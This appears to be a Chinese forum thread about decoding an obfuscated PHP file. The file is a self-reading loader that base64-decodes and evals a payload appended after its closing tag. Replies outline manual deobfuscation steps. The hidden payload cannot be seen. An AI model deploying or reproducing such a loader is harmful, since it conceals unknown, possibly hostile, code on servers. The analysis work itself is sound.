<?php // alex
$OOO0O0O00=__FILE__;$OOO000000=urldecode('%74%68%36%73%62%65%68%71%6c%61%34%63%6f%5f%73%61%64%66%70%6e%72');$OO00O0000=388;$OOO0000O0=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5};$OOO0000O0.=$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16};$OOO0000O0.=$OOO0000O0{3}.$OOO000000{11}.$OOO000000{12}.$OOO0000O0{7}.$OOO000000{5};$O0O0000O0='OOO0000O0';eval(($$O0O0000O0('JE9PME9PMDAwMD0kT09PMDAwMDAwezE3fS4kT09PMDAwMDAwezEyfS4kT09PMDAwMDAwezE4fS4kT09PMDAwMDAwezV9LiRPT08wMDAwMDB7MTl9O2lmKCEwKSRPMDAwTzBPMDA9JE9PME9PMDAwMCgkT09PME8wTzAwLCdyYicpOyRPTzBPTzAwME89JE9PTzAwMDAwMHsxN30uJE9PTzAwMDAwMHsyMH0uJE9PTzAwMDAwMHs1fS4kT09PMDAwMDAwezl9LiRPT08wMDAwMDB7MTZ9OyRPTzBPTzAwTzA9JE9PTzAwMDAwMHsxNH0uJE9PTzAwMDAwMHswfS4kT09PMDAwMDAwezIwfS4kT09PMDAwMDAwezB9LiRPT08wMDAwMDB7MjB9OyRPTzBPTzAwME8oJE8wMDBPME8wMCwxMTQzKTskT08wME8wME8wPSgkT09PMDAwME8wKCRPTzBPTzAwTzAoJE9PME9PMDAwTygkTzAwME8wTzAwLDM4MCksJ0VudGVyeW91d2toUkhZS05XT1VUQWFCYkNjRGRGZkdnSWlKakxsTW1QcFFxU3NWdlh4WnowMTIzNDU2Nzg5Ky89JywnQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVphYmNkZWZnaGlqa2xtbm9wcXJzdHV2d3h5ejAxMjM0NTY3ODkrLycpKSk7ZXZhbCgkT08wME8wME8wKTs=')));return;?>
kr9NHenNHenNHe1zfukgFMaXdoyjcUImb19oUAxyb18mRtwmwJ4LT09NHr8XTzEXRJwmwJXPkr9NTzEXHenNHtILT08XT08XHr8XhtONTznNTzEXHr8Pkr8XHenNHr8XHtXLT08XHr8XHeEXhUXmOB50cbk5d3a3D2iUUylRTlfNaaOnCAkJW2YrcrcMO2fkDApQToxYdanXAbyTF1c2BuiDGjExHjH0YTC3KeLqRz0mRtfnWLYrOAcuUrlhU0xYTL9WAakTayaBa1icBMyJC2OlcMfPDBpqdo1Vd3nxFmY0fbc3Gul6HerZHzW1YjF4KUSvkZLphUL7cMYSd3YlhtONHeEXTznNHeEpK2a2CBXPkr9NHenNHenNHtL7cBYPdZEmNoi0dBXIGo1SdmH9wMi0fuE6RZ93f3FVfzHVd3kmRzr5KTLvGoi0dBXJNI0hNoilCBW+eWPYtjxscbOiwoi0fuEscby1DbC9wLYvdmOldmWsaulXcUwIC29VfoaVfe0Jfoa4ft9Pfo1SKZnjDoyZF2a0Nba0cJ04wJEvNI0hNuOpfoxlNVDbPKDIi+MJMKDBi+DiPzXvfol0doA+eWP8dolVDZnPFMaMNUkjF3HvC3YzRMYzFZwIfulXcT0Jfoa4ft9jF3HJwuklde0JF3O5doazDoalftwIRz4YtjXvDoaice4YtI0hNokvcuL+eWP8col2woYSCbYzNUkJd3O0d20JNjXvcol2NI0hNt9Jd2O5NI0hNt9Pfo1SNJF7

解决方案 »

  1.   

    只提供思路- -想直接获取结果请忽略。
    友情提示----选择好一个好的编辑器,最后能点击其中一个变量,能把所有使用到这个变量的位置显示出来。这种大部分是这种套路,urldecode 一段没有可读性的字符串, 付给一个变量$a。
    然后在根据这个字符串拼接成另一个字符串,并付给一个变量$b,一般来说这个$b 是php的函数。而且大部分情况是base64_decode.
    再base64解码一堆字符串,然后再 balabala..
    后面就不说了,无非是是否还需要按上面的套路来而已。只要你一步一步来,自己就能分析出来究竟执行了什么。
      

  2.   

    有,百度。=能不能用就不清楚了
    https://www.baidu.com/s?wd=$OOO0O0O00&rsv_spt=1&rsv_iqid=0xa4503d520002e3f4&issp=1&f=8&rsv_bp=0&rsv_idx=2&ie=utf-8&tn=baiduhome_pg&rsv_enter=1&rsv_n=2&rsv_sug3=1